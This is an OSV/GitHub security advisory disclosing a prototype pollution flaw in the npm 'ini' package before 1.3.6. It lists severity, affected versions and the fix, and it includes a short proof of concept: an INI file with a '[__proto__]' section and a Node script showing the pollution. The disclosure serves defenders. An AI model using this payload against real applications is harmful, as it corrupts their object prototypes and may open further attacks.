GHSA-qqgx-2p2h-9c37

Suggest an improvement
Source
https://github.com/advisories/GHSA-qqgx-2p2h-9c37
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/12/GHSA-qqgx-2p2h-9c37/GHSA-qqgx-2p2h-9c37.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-qqgx-2p2h-9c37
Aliases
Related
Published
2020-12-10T16:53:45Z
Modified
2024-08-01T09:26:53.991007Z
Severity
  • 7.3 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L CVSS Calculator
Summary
ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse
Details

Overview

The ini npm package before version 1.3.6 has a Prototype Pollution vulnerability.

If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.

Patches

This has been patched in 1.3.6.

Steps to reproduce

payload.ini

[__proto__]
polluted = "polluted"

poc.js:

var fs = require('fs')
var ini = require('ini')

var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)
> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted
Database specific
{
    "nvd_published_at": "2020-12-11T11:15:00Z",
    "cwe_ids": [
        "CWE-1321"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2020-12-10T16:51:39Z"
}
References

Affected packages

npm / ini

Package

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
1.3.6